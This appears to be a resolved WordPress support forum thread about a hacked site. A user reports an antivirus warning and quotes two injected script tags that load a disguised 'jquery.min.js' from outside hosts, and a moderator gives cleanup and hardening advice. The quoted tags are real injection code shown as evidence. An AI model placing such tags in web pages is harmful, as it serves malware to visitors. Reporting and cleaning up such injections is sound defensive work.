Support » How-To and Troubleshooting » [Resolved] Security breach?

[Resolved] Security breach?

Viewing 10 replies - 1 through 10 (of 10 total)
  • I was able to reproduce the issue again.

    When visiting the site, my virus protection program, Avast shows this message:


    avast Web Shield has blocked a threat. No further action is required.

    Object: http://edisonsbar.com/in.cgi?4|>{gzip}
    Infection: HTML:RedirME-inf [Trj]
    Action: Connection aborted
    Process: C:\Program Files\Mozilla\Firefox\firefox.exe

    The threat was detected and blocked while downloading an item from the web.

    This is happening on one of my other WordPress sites (on the same server). I noticed that this malicious code was being inserted into the index page within the code of the first blog post:

    <h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>


    <h5><script src=http://yellow.gaindirectory.org/js/jquery.min.js></script></h5>

    I never added this code and it’s not in the template file of the theme.

    Moderator James Huff


    I believe this is part of a current hack that is injecting code into all PHP files (not just WordPress) on a few shared hosting providers. Remain calm and carefully follow this guide:


    My non-WordPress sites (on the same server) are unaffected. I contacted the hosting provider (mt) and they haven’t had any other reports of this.

    It appears that the hack was injected into the database, not the PHP files. The malicious code was added to a blog post.

    Moderator James Huff


    Remove the code from the post, then run through this guide to make sure that nothing else is wrong:


    When you’re done, implement some (if not all) of the recommended security measures:


    Do you know of a good plugin to install for security? The recommended ones seem to be outdated and I was experiencing issues with Secure WordPress.

    Moderator James Huff


    I honestly don’t recommend any of them. Most of the current security plugins simply scan for “vulnerabilities” and the rest simply provide a software method of implementing the recommended security measures. If you used a plugin like that, all a hacker would have to do is reset your plugins to drop all of your security measures. It’s better to follow the guide that I linked to and manually implement the security measures.


    Moderator James Huff


    You’re welcome!

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘[Resolved] Security breach?’ is closed to new replies.
Skip to toolbar